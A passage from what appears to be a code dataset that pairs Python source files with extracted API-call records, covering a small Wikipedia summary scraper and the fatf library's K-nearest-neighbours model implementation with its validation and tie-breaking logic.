] | [((2781, 2807), 'os.path.isabs', 'os.path.isabs', (['output_path'], {}), '(output_path)\n', (2794, 2807), False, 'import os\n'), ((2831, 2860), 'os.path.normcase', 'os.path.normcase', (['output_path'], {}), '(output_path)\n', (2847, 2860), False, 'import os\n'), ((3062, 3096), 'os.path.normcase', 'os.path.normcase', (['abs_include_path'], {}), '(abs_include_path)\n', (3078, 3096), False, 'import os\n'), ((3366, 3397), 'os.path.splitdrive', 'os.path.splitdrive', (['output_path'], {}), '(output_path)\n', (3384, 3397), False, 'import os\n'), ((3425, 3461), 'os.path.splitdrive', 'os.path.splitdrive', (['abs_include_path'], {}), '(abs_include_path)\n', (3443, 3461), False, 'import os\n'), ((3569, 3615), 'os.path.relpath', 'os.path.relpath', (['abs_include_path', 'output_path'], {}), '(abs_include_path, output_path)\n', (3584, 3615), False, 'import os\n'), ((3835, 3870), 'os.path.split', 'os.path.split', (['pch.header_file.path'], {}), '(pch.header_file.path)\n', (3848, 3870), False, 'import os\n'), ((2877, 2904), 'os.path.isabs', 'os.path.isabs', (['include_path'], {}), '(include_path)\n', (2890, 2904), False, 'import os\n'), ((2937, 2976), 'os.path.join', 'os.path.join', (['output_path', 'include_path'], {}), '(output_path, include_path)\n', (2949, 2976), False, 'import os\n'), ((3523, 3553), 'os.path.normcase', 'os.path.normcase', (['include_path'], {}), '(include_path)\n', (3539, 3553), False, 'import os\n'), ((4026, 4069), 'os.path.join', 'os.path.join', (['build_root', 'pch.pch_file.path'], {}), '(build_root, pch.pch_file.path)\n', (4038, 4069), False, 'import os\n'), ((5529, 5558), 'os.path.splitext', 'os.path.splitext', (['source_file'], {}), '(source_file)\n', (5545, 5558), False, 'import os\n')] |
import wikipedia
from pprint import pprint
import json, os
class WikipediaScraper:
    """Thin wrapper around the ``wikipedia`` package that returns a
    title/summary dictionary for a search term."""

    def __init__(self):
        pass

    def get(self, term):
        """Return ``{'title': ..., 'summary': ...}`` for the best match.

        Raises RuntimeError when the search yields no results at all;
        ambiguous page names are answered with an explanatory summary
        instead of raising.
        """
        try:
            matches = wikipedia.search(term)
            if not matches:
                raise RuntimeError(f'No wikipedia page for: {term}')
            # auto_suggest=False keeps the exact top search hit.
            page = wikipedia.page(matches[0], auto_suggest=False)
            return {'title': page.title, 'summary': page.summary}
        except wikipedia.DisambiguationError:
            return {'title': term, 'summary': 'No summary could be found as the plant name is ambiguous. Try supplying a more specific plant name, such as "Peppermint" instead of "Mint", or even the latin name, "Mentha piperita," to improve results.'}
| [
"wikipedia.page",
"wikipedia.search"
] | [((183, 205), 'wikipedia.search', 'wikipedia.search', (['term'], {}), '(term)\n', (199, 205), False, 'import wikipedia\n'), ((333, 379), 'wikipedia.page', 'wikipedia.page', (['results[0]'], {'auto_suggest': '(False)'}), '(results[0], auto_suggest=False)\n', (347, 379), False, 'import wikipedia\n')] |
"""
The :mod:`fatf.utils.models.models` module holds custom models.
The models implemented in this module are mainly used for used for
FAT Forensics package testing and the examples in the documentation.
"""
# Author: <NAME> <<EMAIL>>
# License: new BSD
import abc
from typing import Optional
import numpy as np
import fatf.utils.array.tools as fuat
import fatf.utils.array.validation as fuav
import fatf.utils.distances as fud
from fatf.exceptions import (IncorrectShapeError, PrefittedModelError,
UnfittedModelError)
__all__ = ['KNN']
class Model(abc.ABC):
    """
    Abstract base class for predictive models.

    Subclasses must implement ``fit`` and ``predict``; ``predict_proba``
    is optional and raises ``NotImplementedError`` unless overridden.
    This is a scikit-learn-inspired model specification relied on
    throughout the package.

    Raises
    ------
    NotImplementedError
        Any of the required methods -- ``fit`` or ``predict`` -- is not
        implemented.
    """

    # pylint: disable=invalid-name

    @abc.abstractmethod
    def __init__(self) -> None:
        """Initialise the model."""

    @abc.abstractmethod
    def fit(self, X: np.ndarray, y: np.ndarray) -> None:
        """Fit the model to a 2-dimensional data array ``X`` and a
        1-dimensional labels array ``y``."""

    @abc.abstractmethod
    def predict(self, X: np.ndarray) -> None:
        """Predict labels for a 2-dimensional data array ``X``."""

    def predict_proba(self, X: np.ndarray) -> None:
        """Predict label probabilities for a 2-dimensional data array
        ``X``.

        Raises
        ------
        NotImplementedError
            Probability prediction is optional and not implemented by
            default.
        """
        raise NotImplementedError
class KNN(Model):
"""
A K-Nearest Neighbours model based on Euclidean distance.
When the ``k`` parameter is set to 0 the model works as a majority class
classifier. In case the count of neighbours (within ``k``) results in a
tie the overall majority class for the whole training data is returned.
Finally, when the training data contains categorical (i.e. non-numerical,
e.g. strings) columns the distance for these columns is 0 when the value
matches and 1 otherwise.
This model can operate in two modes: *classifier* or *regressor*. The first
one works for categorical and numerical targets and provides two predictive
methods: ``predict`` -- for predicting labels and ``predict_proba`` for
predicting probabilities of labels. The regressor mode, on the other hand,
requires the target to be numerical and it only supports the ``predict``
method, which returns the average of the target value of the ``k``
neighbours for the queried data point.
Parameters
----------
k : integer, optional (default=3)
The number of neighbours used to make a prediction. Defaults to 3.
mode : string, optional (default='classifier')
The mode in which the model will operate. Either ``'classifier'``
(``'c'``) or ``'regressor'`` (``'r'``). In the latter case
``predict_proba`` method is disabled.
Raises
------
PrefittedModelError
Raised when trying to fit a model that has already been fitted. Usually
raised when calling the ``fit`` method for the second time. Try using
the ``clear`` method to reset the model before fitting it again.
TypeError
The ``k`` parameter is not an integer.
UnfittedModelError
Raised when trying to predict data with a model that has not been
fitted yet. Try using the ``fit`` method to fit the model first.
ValueError
The ``k`` parameter is a negative number or the ``mode`` parameter does
not have one of the allowed values: ``'c'``, ``'classifier'``, ``'r'``
or ``'regressor'``.
Attributes
----------
_MODES : Set[string]
Possible modes of the KNN model: ``'classifier'`` (``'c'``) or
``'regressor'`` (``'r'``).
_k : integer
The number of neighbours used to make a prediction.
_is_classifier : boolean
True when the model is initialised (and operates) as a classifier.
False when it acts as a regressor.
_is_fitted : boolean
A Boolean variable indicating whether the model is fitted.
_X : numpy.ndarray
The KNN model training data.
_y : numpy.ndarray
The KNN model training labels.
_X_n : integer
The number of data points in the training set.
_unique_y : numpy.ndarray
An array with unique labels in the training labels set ordered
lexicographically.
_unique_y_counts : numpy.ndarray
An array with counts of the unique labels in the training labels set.
_unique_y_probabilities : numpy.ndarray
Probabilities of labels calculated using their frequencies in the
training data.
_majority_label : Union[string, integer, float]
The most common label in the training set.
_is_structured : boolean
A Boolean variable indicating whether the model has been fitted on a
structured numpy array.
_categorical_indices : numpy.ndarray
An array with categorical indices in the training array.
_numerical_indices : numpy.ndarray
An array with numerical indices in the training array.
"""
# pylint: disable=too-many-instance-attributes
_MODES = set(['classifier', 'c', 'regressor', 'r'])
def __init__(self, k: int = 3, mode: Optional[str] = None) -> None:
"""
Initialises the KNN model with the selected ``k`` parameter.
"""
super().__init__()
if not isinstance(k, int):
raise TypeError('The k parameter has to be an integer.')
if k < 0:
raise ValueError('The k parameter has to be a positive integer.')
if mode is None:
self._is_classifier = True
else:
if mode in self._MODES:
self._is_classifier = mode[0] == 'c'
else:
raise ValueError(('The mode parameter has to have one of the '
'following values {}.').format(self._MODES))
self._k = k
self._is_fitted = False
self._X = np.ndarray((0, 0)) # pylint: disable=invalid-name
self._y = np.ndarray((0, ))
self._X_n = int() # pylint: disable=invalid-name
self._unique_y = np.ndarray((0, ))
self._unique_y_counts = np.ndarray((0, ))
self._unique_y_probabilities = np.ndarray((0, ))
self._majority_label = None
self._is_structured = False
self._categorical_indices = np.ndarray((0, ))
self._numerical_indices = np.ndarray((0, ))
    def fit(self, X: np.ndarray, y: np.ndarray) -> None:
        """
        Fits the model.
        Parameters
        ----------
        X : numpy.ndarray
            The KNN training data.
        y : numpy.ndarray
            The KNN training labels.
        Raises
        ------
        IncorrectShapeError
            Either the ``X`` array is not 2-dimensional, the ``y`` array is not
            1-dimensional, the number of rows in ``X`` is not the same as the
            number of elements in ``y`` or the ``X`` array has 0 rows or 0
            columns.
        PrefittedModelError
            Trying to fit the model when it has already been fitted. Usually
            raised when calling the ``fit`` method for the second time without
            clearing the model first.
        TypeError
            Trying to fit a KNN predictor in a regressor mode with
            non-numerical target variable.
        """
        # Validation: fail fast, before any state is mutated.
        if self._is_fitted:
            raise PrefittedModelError('This model has already been fitted.')
        if not fuav.is_2d_array(X):
            raise IncorrectShapeError('The training data must be a 2-'
                                      'dimensional array.')
        if not fuav.is_1d_array(y):
            raise IncorrectShapeError('The training data labels must be a 1-'
                                      'dimensional array.')
        if X.shape[0] == 0:
            raise IncorrectShapeError('The data array has to have at least '
                                      'one data point.')
        # If the array is structured the fuav.is_2d_array function takes care
        # of checking whether there is at least one column
        if not fuav.is_structured_array(X) and X.shape[1] == 0:
            raise IncorrectShapeError('The data array has to have at least '
                                      'one feature.')
        if X.shape[0] != y.shape[0]:
            raise IncorrectShapeError('The number of samples in X must be the '
                                      'same as the number of labels in y.')
        if not self._is_classifier and not fuav.is_numerical_array(y):
            raise TypeError('Regressor can only be fitted for a numerical '
                            'target vector.')
        # Split feature indices by type so distances can mix Euclidean
        # (numerical) and 0/1 match (categorical) components.
        numerical_indices, categorical_indices = fuat.indices_by_type(X)
        self._numerical_indices = numerical_indices
        self._categorical_indices = categorical_indices
        self._is_structured = fuav.is_structured_array(X)
        self._X = X
        self._y = y
        if self._is_classifier:
            unique_y, unique_y_counts = np.unique(self._y, return_counts=True)
            # Order labels lexicographically.
            unique_y_sort_index = np.argsort(unique_y)
            self._unique_y = unique_y[unique_y_sort_index]
            self._unique_y_counts = unique_y_counts[unique_y_sort_index]
            # How many other labels have the same count.
            top_y_index = self._unique_y_counts == np.max(
                self._unique_y_counts)
            # Count ties are broken by lexicographic order: smallest wins.
            top_y_unique_sorted = np.sort(self._unique_y[top_y_index])
            self._majority_label = top_y_unique_sorted[0]
            self._unique_y_probabilities = (
                self._unique_y_counts / self._y.shape[0])
        else:
            # Regressor mode: the fallback "majority" value is the mean of
            # the targets; label statistics stay empty.
            self._majority_label = self._y.mean()
            self._unique_y = np.ndarray((0, ))
            self._unique_y_counts = np.ndarray((0, ))
            self._unique_y_probabilities = np.ndarray((0, ))
        self._X_n = self._X.shape[0]
        self._is_fitted = True
def clear(self) -> None:
"""
Clears (unfits) the model.
Raises
------
UnfittedModelError
Raised when trying to clear a model that has not been fitted yet.
Try using the fit method to ``fit`` the model first.
"""
if not self._is_fitted:
raise UnfittedModelError('This model has not been fitted yet.')
self._is_fitted = False
self._X = np.ndarray((0, 0))
self._y = np.ndarray((0, ))
self._X_n = int()
self._unique_y = np.ndarray((0, ))
self._unique_y_counts = np.ndarray((0, ))
self._unique_y_probabilities = np.ndarray((0, ))
self._majority_label = None
self._is_structured = False
self._categorical_indices = np.ndarray((0, ))
self._numerical_indices = np.ndarray((0, ))
def _get_distances(self, X: np.ndarray) -> np.ndarray:
"""
Gets distances for a mixture of numerical and categorical features.
For numerical columns the distance is calculated as the Euclidean
distance. For categorical columns (i.e. non-numerical, e.g. strings)
the distance is 0 when the value matches and 1 otherwise.
Parameters
----------
X : numpy.ndarray
A data array for which distances to the training data will be
calculated.
Raises
------
AssertionError
Raised when the model is not fitted, X is not a 2-dimensional
array or X's dtype is different than training data's dtype. It is
also raised when the distances matrix is not 2-dimensional.
Returns
-------
distances : numpy.ndarray
An array of distances between X and the training data.
"""
# pylint: disable=invalid-name
assert self._is_fitted, 'Cannot calculate distances on unfitted model.'
assert fuav.is_2d_array(X), 'X must be a 2-dimensional array.'
assert fuav.are_similar_dtype_arrays(X, self._X), \
'X must have the same dtype as the training data.'
distances_shape = (self._X.shape[0], X.shape[0])
categorical_distances = np.zeros(distances_shape)
numerical_distances = np.zeros(distances_shape)
if self._is_structured:
if self._categorical_indices.size:
categorical_distances = fud.binary_array_distance(
self._X[self._categorical_indices],
X[self._categorical_indices])
if self._numerical_indices.size:
numerical_distances = fud.euclidean_array_distance(
self._X[self._numerical_indices],
X[self._numerical_indices])
else:
if self._categorical_indices.size:
categorical_distances = fud.binary_array_distance(
self._X[:, self._categorical_indices],
X[:, self._categorical_indices])
if self._numerical_indices.size:
numerical_distances = fud.euclidean_array_distance(
self._X[:, self._numerical_indices],
X[:, self._numerical_indices])
assert categorical_distances.shape == numerical_distances.shape, \
'Different number of point-wise distances for these feature types.'
distances = categorical_distances + numerical_distances
assert fuav.is_2d_array(distances), 'Distances matrix must be 2D.'
return distances
    def predict(self, X: np.ndarray) -> np.ndarray:
        """
        Predicts labels of new instances with the fitted model.
        Parameters
        ----------
        X : numpy.ndarray
            The data for which labels will be predicted.
        Raises
        ------
        IncorrectShapeError
            X is not a 2-dimensional array, it has 0 rows or it has a different
            number of columns than the training data.
        UnfittedModelError
            Raised when trying to predict data when the model has not been
            fitted yet. Try using the ``fit`` method to fit the model first.
        ValueError
            X has a different dtype than the data used to fit the model.
        Returns
        -------
        predictions : numpy.ndarray
            Predicted class labels for each data point.
        """
        # pylint: disable=too-many-locals,too-many-branches
        if not self._is_fitted:
            raise UnfittedModelError('This model has not been fitted yet.')
        if not fuav.is_2d_array(X):
            raise IncorrectShapeError('X must be a 2-dimensional array. If '
                                      'you want to predict a single data '
                                      'point please format it as a single row '
                                      'in a 2-dimensional array.')
        if not fuav.are_similar_dtype_arrays(X, self._X):
            raise ValueError('X must have the same dtype as the training '
                             'data.')
        if not X.shape[0]:
            raise IncorrectShapeError('X must have at least one row.')
        # No need to check for columns in a structured array -> this is handled
        # by the dtype checker.
        if not fuav.is_structured_array(X):
            if X.shape[1] != self._X.shape[1]:
                raise IncorrectShapeError(('X must have the same number of '
                                           'columns as the training data '
                                           '({}).').format(self._X.shape[1]))
        predictions = np.empty((X.shape[0], ))
        # Only do a neighbour search when k is smaller than the training set;
        # otherwise fall back to the global majority label (see else branch).
        if self._k < self._X_n:
            distances = self._get_distances(X)
            # If there are 3 nearest neighbours within distances 1, 2 and 2 and
            # k is set to 2, then argpartition will always take the first
            # within distance 2.
            knn = np.argpartition(distances, self._k, axis=0)
            predictions = []
            # One column of knn per queried data point.
            for column in knn.T:
                close_labels = self._y[column[:self._k]]
                if self._is_classifier:
                    values, counts = np.unique(
                        close_labels, return_counts=True)
                    # If there is a tie in the counts take into consideration
                    # the overall label count in the training data to resolve
                    # it.
                    top_label_index = counts == counts.max()
                    top_label_unique_sorted = np.sort(values[top_label_index])
                    assert len(top_label_unique_sorted.shape) == 1, \
                        'This should be a flat array.'
                    if top_label_unique_sorted.shape[0] > 1:
                        # Resolve the tie.
                        # Get count of these label for the training data.
                        labels_filter = np.array(
                            self._unique_y.shape[0] * [False])
                        # Build a boolean mask selecting all tied labels.
                        for top_prediction in top_label_unique_sorted:
                            unique_y_filter = self._unique_y == top_prediction
                            np.logical_or(
                                labels_filter,
                                unique_y_filter,
                                out=labels_filter)
                        g_top_label = self._unique_y[labels_filter]
                        g_top_label_counts = (
                            self._unique_y_counts[labels_filter])
                        # What if any of the global labels have the same count?
                        g_top_label_index = g_top_label_counts == np.max(
                            g_top_label_counts)
                        # Remaining ties fall back to lexicographic order.
                        g_top_label_sorted = np.sort(
                            g_top_label[g_top_label_index])
                        prediction = g_top_label_sorted[0]
                    else:
                        prediction = top_label_unique_sorted[0]
                else:
                    # Regressor mode: average the k nearest targets.
                    prediction = close_labels.mean()
                predictions.append(prediction)
            predictions = np.array(predictions)
        else:
            # k >= number of training points: every query sees the whole
            # training set, so return the precomputed majority label/mean.
            predictions = np.array(X.shape[0] * [self._majority_label])
        return predictions
def predict_proba(self, X: np.ndarray) -> np.ndarray:
"""
Calculates label probabilities for new instances with the fitted model.
Parameters
----------
X : numpy.ndarray
The data for which labels probabilities will be predicted.
Raises
------
IncorrectShapeError
X is not a 2-dimensional array, it has 0 rows or it has a different
number of columns than the training data.
UnfittedModelError
Raised when trying to predict data when the model has not been
fitted yet. Try using the ``fit`` method to fit the model first.
RuntimeError
Raised when trying to use this method when the predictor is
initialised as a regressor.
ValueError
X has a different dtype than the data used to fit the model.
Returns
-------
probabilities : numpy.ndarray
Probabilities of each instance belonging to every class. The labels
in the return array are ordered by lexicographic order.
"""
if not self._is_classifier:
raise RuntimeError('This functionality is not available for a '
'regressor.')
if not self._is_fitted:
raise UnfittedModelError('This model has not been fitted yet.')
if not fuav.is_2d_array(X):
raise IncorrectShapeError('X must be a 2-dimensional array. If '
'you want to predict a single data '
'point please format it as a single row '
'in a 2-dimensional array.')
if not fuav.are_similar_dtype_arrays(X, self._X):
raise ValueError('X must have the same dtype as the training '
'data.')
if not X.shape[0]:
raise IncorrectShapeError('X must have at least one row.')
# No need to check for columns in a structured array -> this is handled
# by the dtype checker.
if not fuav.is_structured_array(X):
if X.shape[1] != self._X.shape[1]:
raise IncorrectShapeError(('X must have the same number of '
'columns as the training data '
'({}).').format(self._X.shape[1]))
probabilities = np.empty((X.shape[0], self._unique_y.shape[0]))
if self._k < self._X_n:
distances = self._get_distances(X)
knn = np.argpartition(distances, self._k, axis=0)
probabilities = []
for column in knn.T:
close_labels = self._y[column[:self._k]]
values, counts = np.unique(close_labels, return_counts=True)
total_counts = np.sum(counts)
probs = np.zeros((self._unique_y.shape[0], ))
for i in range(values.shape[0]):
ind = np.where(self._unique_y == values[i])[0]
probs[ind] = counts[i] / total_counts
probabilities.append(probs)
probabilities = np.array(probabilities)
else:
probabilities = np.tile(self._unique_y_probabilities,
(X.shape[0], 1))
return probabilities
| [
"fatf.exceptions.IncorrectShapeError",
"fatf.exceptions.UnfittedModelError",
"fatf.utils.array.validation.is_structured_array",
"numpy.argsort",
"fatf.utils.array.validation.is_1d_array",
"numpy.array",
"fatf.utils.array.validation.is_2d_array",
"fatf.exceptions.PrefittedModelError",
"numpy.where",
... | [((6935, 6953), 'numpy.ndarray', 'np.ndarray', (['(0, 0)'], {}), '((0, 0))\n', (6945, 6953), True, 'import numpy as np\n'), ((7004, 7020), 'numpy.ndarray', 'np.ndarray', (['(0,)'], {}), '((0,))\n', (7014, 7020), True, 'import numpy as np\n'), ((7105, 7121), 'numpy.ndarray', 'np.ndarray', (['(0,)'], {}), '((0,))\n', (7115, 7121), True, 'import numpy as np\n'), ((7155, 7171), 'numpy.ndarray', 'np.ndarray', (['(0,)'], {}), '((0,))\n', (7165, 7171), True, 'import numpy as np\n'), ((7212, 7228), 'numpy.ndarray', 'np.ndarray', (['(0,)'], {}), '((0,))\n', (7222, 7228), True, 'import numpy as np\n'), ((7338, 7354), 'numpy.ndarray', 'np.ndarray', (['(0,)'], {}), '((0,))\n', (7348, 7354), True, 'import numpy as np\n'), ((7390, 7406), 'numpy.ndarray', 'np.ndarray', (['(0,)'], {}), '((0,))\n', (7400, 7406), True, 'import numpy as np\n'), ((9716, 9739), 'fatf.utils.array.tools.indices_by_type', 'fuat.indices_by_type', (['X'], {}), '(X)\n', (9736, 9739), True, 'import fatf.utils.array.tools as fuat\n'), ((9879, 9906), 'fatf.utils.array.validation.is_structured_array', 'fuav.is_structured_array', (['X'], {}), '(X)\n', (9903, 9906), True, 'import fatf.utils.array.validation as fuav\n'), ((11425, 11443), 'numpy.ndarray', 'np.ndarray', (['(0, 0)'], {}), '((0, 0))\n', (11435, 11443), True, 'import numpy as np\n'), ((11462, 11478), 'numpy.ndarray', 'np.ndarray', (['(0,)'], {}), '((0,))\n', (11472, 11478), True, 'import numpy as np\n'), ((11531, 11547), 'numpy.ndarray', 'np.ndarray', (['(0,)'], {}), '((0,))\n', (11541, 11547), True, 'import numpy as np\n'), ((11581, 11597), 'numpy.ndarray', 'np.ndarray', (['(0,)'], {}), '((0,))\n', (11591, 11597), True, 'import numpy as np\n'), ((11638, 11654), 'numpy.ndarray', 'np.ndarray', (['(0,)'], {}), '((0,))\n', (11648, 11654), True, 'import numpy as np\n'), ((11764, 11780), 'numpy.ndarray', 'np.ndarray', (['(0,)'], {}), '((0,))\n', (11774, 11780), True, 'import numpy as np\n'), ((11816, 11832), 'numpy.ndarray', 'np.ndarray', (['(0,)'], 
{}), '((0,))\n', (11826, 11832), True, 'import numpy as np\n'), ((12921, 12940), 'fatf.utils.array.validation.is_2d_array', 'fuav.is_2d_array', (['X'], {}), '(X)\n', (12937, 12940), True, 'import fatf.utils.array.validation as fuav\n'), ((12992, 13033), 'fatf.utils.array.validation.are_similar_dtype_arrays', 'fuav.are_similar_dtype_arrays', (['X', 'self._X'], {}), '(X, self._X)\n', (13021, 13033), True, 'import fatf.utils.array.validation as fuav\n'), ((13190, 13215), 'numpy.zeros', 'np.zeros', (['distances_shape'], {}), '(distances_shape)\n', (13198, 13215), True, 'import numpy as np\n'), ((13246, 13271), 'numpy.zeros', 'np.zeros', (['distances_shape'], {}), '(distances_shape)\n', (13254, 13271), True, 'import numpy as np\n'), ((14436, 14463), 'fatf.utils.array.validation.is_2d_array', 'fuav.is_2d_array', (['distances'], {}), '(distances)\n', (14452, 14463), True, 'import fatf.utils.array.validation as fuav\n'), ((16602, 16625), 'numpy.empty', 'np.empty', (['(X.shape[0],)'], {}), '((X.shape[0],))\n', (16610, 16625), True, 'import numpy as np\n'), ((21675, 21722), 'numpy.empty', 'np.empty', (['(X.shape[0], self._unique_y.shape[0])'], {}), '((X.shape[0], self._unique_y.shape[0]))\n', (21683, 21722), True, 'import numpy as np\n'), ((8386, 8444), 'fatf.exceptions.PrefittedModelError', 'PrefittedModelError', (['"""This model has already been fitted."""'], {}), "('This model has already been fitted.')\n", (8405, 8444), False, 'from fatf.exceptions import IncorrectShapeError, PrefittedModelError, UnfittedModelError\n'), ((8460, 8479), 'fatf.utils.array.validation.is_2d_array', 'fuav.is_2d_array', (['X'], {}), '(X)\n', (8476, 8479), True, 'import fatf.utils.array.validation as fuav\n'), ((8499, 8570), 'fatf.exceptions.IncorrectShapeError', 'IncorrectShapeError', (['"""The training data must be a 2-dimensional array."""'], {}), "('The training data must be a 2-dimensional array.')\n", (8518, 8570), False, 'from fatf.exceptions import IncorrectShapeError, 
PrefittedModelError, UnfittedModelError\n'), ((8627, 8646), 'fatf.utils.array.validation.is_1d_array', 'fuav.is_1d_array', (['y'], {}), '(y)\n', (8643, 8646), True, 'import fatf.utils.array.validation as fuav\n'), ((8666, 8744), 'fatf.exceptions.IncorrectShapeError', 'IncorrectShapeError', (['"""The training data labels must be a 1-dimensional array."""'], {}), "('The training data labels must be a 1-dimensional array.')\n", (8685, 8744), False, 'from fatf.exceptions import IncorrectShapeError, PrefittedModelError, UnfittedModelError\n'), ((8832, 8906), 'fatf.exceptions.IncorrectShapeError', 'IncorrectShapeError', (['"""The data array has to have at least one data point."""'], {}), "('The data array has to have at least one data point.')\n", (8851, 8906), False, 'from fatf.exceptions import IncorrectShapeError, PrefittedModelError, UnfittedModelError\n'), ((9167, 9238), 'fatf.exceptions.IncorrectShapeError', 'IncorrectShapeError', (['"""The data array has to have at least one feature."""'], {}), "('The data array has to have at least one feature.')\n", (9186, 9238), False, 'from fatf.exceptions import IncorrectShapeError, PrefittedModelError, UnfittedModelError\n'), ((9335, 9441), 'fatf.exceptions.IncorrectShapeError', 'IncorrectShapeError', (['"""The number of samples in X must be the same as the number of labels in y."""'], {}), "(\n 'The number of samples in X must be the same as the number of labels in y.'\n )\n", (9354, 9441), False, 'from fatf.exceptions import IncorrectShapeError, PrefittedModelError, UnfittedModelError\n'), ((10020, 10058), 'numpy.unique', 'np.unique', (['self._y'], {'return_counts': '(True)'}), '(self._y, return_counts=True)\n', (10029, 10058), True, 'import numpy as np\n'), ((10139, 10159), 'numpy.argsort', 'np.argsort', (['unique_y'], {}), '(unique_y)\n', (10149, 10159), True, 'import numpy as np\n'), ((10482, 10518), 'numpy.sort', 'np.sort', (['self._unique_y[top_y_index]'], {}), '(self._unique_y[top_y_index])\n', (10489, 10518), True, 
'import numpy as np\n'), ((10774, 10790), 'numpy.ndarray', 'np.ndarray', (['(0,)'], {}), '((0,))\n', (10784, 10790), True, 'import numpy as np\n'), ((10828, 10844), 'numpy.ndarray', 'np.ndarray', (['(0,)'], {}), '((0,))\n', (10838, 10844), True, 'import numpy as np\n'), ((10889, 10905), 'numpy.ndarray', 'np.ndarray', (['(0,)'], {}), '((0,))\n', (10899, 10905), True, 'import numpy as np\n'), ((11316, 11373), 'fatf.exceptions.UnfittedModelError', 'UnfittedModelError', (['"""This model has not been fitted yet."""'], {}), "('This model has not been fitted yet.')\n", (11334, 11373), False, 'from fatf.exceptions import IncorrectShapeError, PrefittedModelError, UnfittedModelError\n'), ((15484, 15541), 'fatf.exceptions.UnfittedModelError', 'UnfittedModelError', (['"""This model has not been fitted yet."""'], {}), "('This model has not been fitted yet.')\n", (15502, 15541), False, 'from fatf.exceptions import IncorrectShapeError, PrefittedModelError, UnfittedModelError\n'), ((15557, 15576), 'fatf.utils.array.validation.is_2d_array', 'fuav.is_2d_array', (['X'], {}), '(X)\n', (15573, 15576), True, 'import fatf.utils.array.validation as fuav\n'), ((15596, 15763), 'fatf.exceptions.IncorrectShapeError', 'IncorrectShapeError', (['"""X must be a 2-dimensional array. If you want to predict a single data point please format it as a single row in a 2-dimensional array."""'], {}), "(\n 'X must be a 2-dimensional array. 
If you want to predict a single data point please format it as a single row in a 2-dimensional array.'\n )\n", (15615, 15763), False, 'from fatf.exceptions import IncorrectShapeError, PrefittedModelError, UnfittedModelError\n'), ((15892, 15933), 'fatf.utils.array.validation.are_similar_dtype_arrays', 'fuav.are_similar_dtype_arrays', (['X', 'self._X'], {}), '(X, self._X)\n', (15921, 15933), True, 'import fatf.utils.array.validation as fuav\n'), ((16093, 16145), 'fatf.exceptions.IncorrectShapeError', 'IncorrectShapeError', (['"""X must have at least one row."""'], {}), "('X must have at least one row.')\n", (16112, 16145), False, 'from fatf.exceptions import IncorrectShapeError, PrefittedModelError, UnfittedModelError\n'), ((16273, 16300), 'fatf.utils.array.validation.is_structured_array', 'fuav.is_structured_array', (['X'], {}), '(X)\n', (16297, 16300), True, 'import fatf.utils.array.validation as fuav\n'), ((16912, 16955), 'numpy.argpartition', 'np.argpartition', (['distances', 'self._k'], {'axis': '(0)'}), '(distances, self._k, axis=0)\n', (16927, 16955), True, 'import numpy as np\n'), ((19096, 19117), 'numpy.array', 'np.array', (['predictions'], {}), '(predictions)\n', (19104, 19117), True, 'import numpy as np\n'), ((19158, 19203), 'numpy.array', 'np.array', (['(X.shape[0] * [self._majority_label])'], {}), '(X.shape[0] * [self._majority_label])\n', (19166, 19203), True, 'import numpy as np\n'), ((20555, 20612), 'fatf.exceptions.UnfittedModelError', 'UnfittedModelError', (['"""This model has not been fitted yet."""'], {}), "('This model has not been fitted yet.')\n", (20573, 20612), False, 'from fatf.exceptions import IncorrectShapeError, PrefittedModelError, UnfittedModelError\n'), ((20628, 20647), 'fatf.utils.array.validation.is_2d_array', 'fuav.is_2d_array', (['X'], {}), '(X)\n', (20644, 20647), True, 'import fatf.utils.array.validation as fuav\n'), ((20667, 20834), 'fatf.exceptions.IncorrectShapeError', 'IncorrectShapeError', (['"""X must be a 2-dimensional 
array. If you want to predict a single data point please format it as a single row in a 2-dimensional array."""'], {}), "(\n 'X must be a 2-dimensional array. If you want to predict a single data point please format it as a single row in a 2-dimensional array.'\n )\n", (20686, 20834), False, 'from fatf.exceptions import IncorrectShapeError, PrefittedModelError, UnfittedModelError\n'), ((20963, 21004), 'fatf.utils.array.validation.are_similar_dtype_arrays', 'fuav.are_similar_dtype_arrays', (['X', 'self._X'], {}), '(X, self._X)\n', (20992, 21004), True, 'import fatf.utils.array.validation as fuav\n'), ((21164, 21216), 'fatf.exceptions.IncorrectShapeError', 'IncorrectShapeError', (['"""X must have at least one row."""'], {}), "('X must have at least one row.')\n", (21183, 21216), False, 'from fatf.exceptions import IncorrectShapeError, PrefittedModelError, UnfittedModelError\n'), ((21344, 21371), 'fatf.utils.array.validation.is_structured_array', 'fuav.is_structured_array', (['X'], {}), '(X)\n', (21368, 21371), True, 'import fatf.utils.array.validation as fuav\n'), ((21821, 21864), 'numpy.argpartition', 'np.argpartition', (['distances', 'self._k'], {'axis': '(0)'}), '(distances, self._k, axis=0)\n', (21836, 21864), True, 'import numpy as np\n'), ((22417, 22440), 'numpy.array', 'np.array', (['probabilities'], {}), '(probabilities)\n', (22425, 22440), True, 'import numpy as np\n'), ((22483, 22537), 'numpy.tile', 'np.tile', (['self._unique_y_probabilities', '(X.shape[0], 1)'], {}), '(self._unique_y_probabilities, (X.shape[0], 1))\n', (22490, 22537), True, 'import numpy as np\n'), ((9100, 9127), 'fatf.utils.array.validation.is_structured_array', 'fuav.is_structured_array', (['X'], {}), '(X)\n', (9124, 9127), True, 'import fatf.utils.array.validation as fuav\n'), ((9516, 9542), 'fatf.utils.array.validation.is_numerical_array', 'fuav.is_numerical_array', (['y'], {}), '(y)\n', (9539, 9542), True, 'import fatf.utils.array.validation as fuav\n'), ((10401, 10430), 'numpy.max', 
'np.max', (['self._unique_y_counts'], {}), '(self._unique_y_counts)\n', (10407, 10430), True, 'import numpy as np\n'), ((13392, 13488), 'fatf.utils.distances.binary_array_distance', 'fud.binary_array_distance', (['self._X[self._categorical_indices]', 'X[self._categorical_indices]'], {}), '(self._X[self._categorical_indices], X[self.\n _categorical_indices])\n', (13417, 13488), True, 'import fatf.utils.distances as fud\n'), ((13608, 13703), 'fatf.utils.distances.euclidean_array_distance', 'fud.euclidean_array_distance', (['self._X[self._numerical_indices]', 'X[self._numerical_indices]'], {}), '(self._X[self._numerical_indices], X[self.\n _numerical_indices])\n', (13636, 13703), True, 'import fatf.utils.distances as fud\n'), ((13841, 13943), 'fatf.utils.distances.binary_array_distance', 'fud.binary_array_distance', (['self._X[:, self._categorical_indices]', 'X[:, self._categorical_indices]'], {}), '(self._X[:, self._categorical_indices], X[:, self.\n _categorical_indices])\n', (13866, 13943), True, 'import fatf.utils.distances as fud\n'), ((14063, 14164), 'fatf.utils.distances.euclidean_array_distance', 'fud.euclidean_array_distance', (['self._X[:, 